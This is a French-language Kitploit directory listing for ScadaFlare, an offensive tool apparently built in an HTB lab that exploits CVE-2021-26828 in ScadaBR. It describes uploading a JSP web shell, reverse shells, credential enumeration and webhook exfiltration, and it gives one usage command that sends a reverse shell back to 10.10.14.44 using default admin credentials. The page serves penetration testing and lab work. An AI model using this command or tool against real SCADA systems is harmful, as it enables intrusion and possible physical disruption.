Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-26828-Ultimate — ScadaFlare Framework d'exploitation RCE authentifiée pour ScadaBR (CVE-2021-26828) OpenPLC ScadaBR | Kitploit
Outils/GitHubGitHub/ridpath/cve-2021-26828-ultimate
Génération de PayloadsAnalyse des VulnérabilitésExploitationSécurité SCADA/ICSExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionCommandement et ContrôleRed Teaming
GitHubridpath/cve-2021-26828-ultimate

CVE-2021-26828-Ultimate

ScadaFlare Framework d'exploitation RCE authentifiée pour ScadaBR (CVE-2021-26828) OpenPLC ScadaBR

59il y a 9 moisPas encore vérifié
Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

ScadaFlare - CVE-2021-26828 Kit d'exploitation RCE authentifié

license: MIT tested-on: HTB Alchemy target: ScadaBR <1.1.0 platform: Linux/Windows

Un exploit RCE modulaire post-authentification ciblant ScadaBR <1.1.0, amélioré pour les opérations d'équipe rouge.

ScadaFlare Demo

Fonctionnalités

  • Télécharge un shell .jsp armé via view_edit.shtm
  • Prend en charge les payloads Linux et Windows
  • Support des proxy SOCKS5 / HTTP
  • Déclenchement de reverse shell (standard ou base64)
  • Modules d'énumération (BDD, identifiants, Log4Shell, etc.)
  • Exfiltration par webhook (Slack / Discord)
  • Génération de script de ressources Metasploit
  • Prise en charge du nettoyage (kill switch)
  • Cartographie des techniques MITRE ATT&CK

    PhaseTechniqueID
    Accès initial (post-authentification)Comptes validesT1078
    ExécutionExploitation d'application publiqueT1190
    Exécution de commandesWeb ShellT1505.003
    Actions de privilègeModification de contenu webT1505
    Accès aux identifiantsIdentifiants dans les fichiers de configurationT1552.001
    DécouverteDécouverte de système distantT1018
    ExfiltrationExfiltration via service webT1567.002
    Évasion de la défenseTunnel proxy et protocoleT1090

    CVE

    • CVE-2021-26828
    • Découvert par Fellipe Oliveira
    • Exploit amélioré et modularisé

    Pourquoi cela existe

    Cet exploit a été développé lors de l'analyse du scénario HTB Pro Lab : Alchemy. Le PoC original de Fellipe Oliveira était solide mais :

    Écrit en Python 2

    Manquait de fonctionnalités modernes comme le support des proxy, le nettoyage du shell, le chaînage d'énumération

    Était difficile à étendre ou intégrer dans les workflows des équipes rouges

    Cette version, ScadaFlare, est une réécriture complète en Python 3 avec un support modulaire, plusieurs stratégies d'évasion, le remplacement de la détection d'OS, l'intégration de webhooks, le support des proxy SOCKS et des chaînes d'énumération pour une utilisation opérationnelle réelle.

    Utilisation

    root@kitploit:~
    python3 scadaflare.py http://172.16.0.20:80 admin admin \
      --reverse-ip 10.10.14.44 --reverse-port 4445 \
      --verbose --cleanup
    

    Utilisation légale et éthique uniquement

    ScadaFlare est conçu exclusivement pour :

    • L'éducation au hacking éthique
    • Les tests en laboratoire SCADA
    • La recherche défensive et la validation de vulnérabilités

    Une utilisation non autorisée contre des systèmes industriels réels peut :

    • Perturber des processus physiques
    • Causer des dommages ou des risques de sécurité
    • Entraîner de graves conséquences juridiques

    En utilisant cet outil, vous acceptez l'entière responsabilité de :

    • Obtenir une autorisation écrite explicite
    • Opérer uniquement dans des environnements approuvés

    Licence

    Licence MIT – voir LICENSE

    Télécharger l’outil